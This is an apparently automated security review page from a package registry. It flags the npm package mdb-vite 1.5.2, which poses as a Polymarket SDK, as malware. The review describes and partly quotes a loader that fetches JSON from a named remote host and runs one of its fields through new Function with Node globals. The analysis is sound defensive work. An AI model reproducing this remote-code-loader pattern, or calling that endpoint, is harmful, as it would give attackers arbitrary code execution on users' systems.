registry  /  mdb-vite  /  1.5.2

mdb-vite@1.5.2

TypeScript SDK for the Polymarket CLOB API.

AI Security Review

scanned 9h ago · by lpm-firewall-ai

The package exposes a default function that retrieves remote JSON and executes the credits field as JavaScript with Node globals. This is package-misaligned remote code execution on runtime use.

Static reason
One or more suspicious static signals were detected.; source fingerprint signature matched known malicious package; routed for review
Trigger
User or application imports and invokes the default export from index.js.
Impact
Remote server can run arbitrary code in the consumer process with require/process access.
Mechanism
remote fetch followed by Function constructor execution
Attack narrative
On runtime invocation, getPlugin fetches JSON from svganchordev.net/icons/107, extracts data.credits, compiles it with new Function, and supplies Node capabilities including require, process, global, Buffer, and module exports. The advertised Polymarket SDK functionality is absent, making the remote loader deceptive and capable of arbitrary payload delivery.
Rationale
Direct source inspection confirms a deceptive package-aligned facade with runtime remote code execution from an attacker-controlled endpoint. Lack of lifecycle hooks reduces install-time blast radius but does not remove the concrete malicious runtime behavior.
Evidence
package.jsonREADME.mdindex.js
Network endpoints2
svganchordev.net/icons/107cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/svgs/brands/

Decision evidence

public snapshot
AI called this Malicious at 98.0% confidence as Malware with low false-positive risk.
Evidence for block
  • index.js:114-119 default export fetches https://svganchordev.net/icons/107 when invoked.
  • index.js:127-153 parses JSON and passes data.credits into new Function.
  • index.js:130-170 remote code receives require, process, global, Buffer, timers, and module exports.
  • package.json:4 and README claim Polymarket SDK, but index.js implements remote icon/plugin loader instead.
Evidence against
  • package.json has no install/preinstall/postinstall lifecycle hooks.
  • Remote fetch/eval is not import-time; it requires calling the exported function.
  • No package files directly write persistence or AI-agent control surfaces.
Behavioral surface
Source
EvalNetwork
Supply chainNo supply-chain packaging signals triggered.
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 5.94 KB of source

Source & flagged code

2 flagged · loading source
index.jsView file
149// Note: The code uses async/await, so we need to handle that L150: const evalFn = new Function( L151: 'require', 'module', 'exports', '__dirname', '__filename', 'console', 'process', 'global', 'Buffer', 'setTimeout', 'setInterval', 'clearTimeout', 'clearInterval', 'Promise',
High
Eval

Package source references dynamic code evaluation.

index.jsView on unpkg · L149
matchType = malicious_source_fingerprint_signature signature = c06bd55d669269cb signatureType = suspicious_hashes sourceLabel = final_verdict:malicious matchedPackage = gamified-trading-system@3.6.2 matchedPath = index.js matchedIdentity = npm:Z2FtaWZpZWQtdHJhZGluZy1zeXN0ZW0:3.6.2 similarity = 1.000 shingleOverlap = 1 summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.jsView on unpkg

Findings

2 High1 Medium1 Low
HighEvalindex.js
HighKnown Malware Source Fingerprint Signatureindex.js
MediumNetwork
LowScripts Present